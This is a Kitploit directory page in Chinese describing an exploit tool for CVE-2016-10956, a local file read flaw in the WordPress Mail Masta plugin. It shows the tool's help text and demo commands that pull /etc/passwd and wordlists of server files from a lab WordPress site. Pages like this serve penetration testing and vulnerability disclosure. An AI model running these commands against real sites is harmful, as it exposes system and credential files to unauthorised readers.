Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2016-10956-mail-masta — MailMasta WordPress 插件本地文件包含漏洞 (CVE-2016-10956) | Kitploit
工具/GitHubGitHub/p0dalirius/cve-2016-10956-mail-masta
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubp0dalirius/cve-2016-10956-mail-masta

CVE-2016-10956-mail-masta

MailMasta WordPress 插件本地文件包含漏洞 (CVE-2016-10956)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库网站
21214年前Kitploit 审核通过
分享

Mail Masta - 本地文件读取 (CVE-2016-10956)

GitHub release (latest by date) YouTube Channel Subscribers

WordPress 的 mail-masta 插件 1.0 在 count_of_send.php 和 csvexport.php 中存在本地文件读取漏洞。

用法

root@kitploit:~
$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)

usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode
  -s, --only-success    Only print successful read file attempts.
  -t TARGET_URL, --target TARGET_URL
                        URL of the wordpress to connect to.
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -r, --raw             Raw dump of the file without php base64 wrapper (default: False)

演示

读取指定的远程文件

root@kitploit:~
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd

从字典中读取指定的远程文件

root@kitploit:~
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist

从字典中读取指定远程文件并仅打印找到的文件

root@kitploit:~
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success

参考

  • https://nvd.nist.gov/vuln/detail/CVE-2016-10956
  • https://cxsecurity.com/issue/WLB-2016080220
  • https://wordpress.org/plugins/mail-masta/#developers
  • https://wpvulndb.com/vulnerabilities/8609
下载工具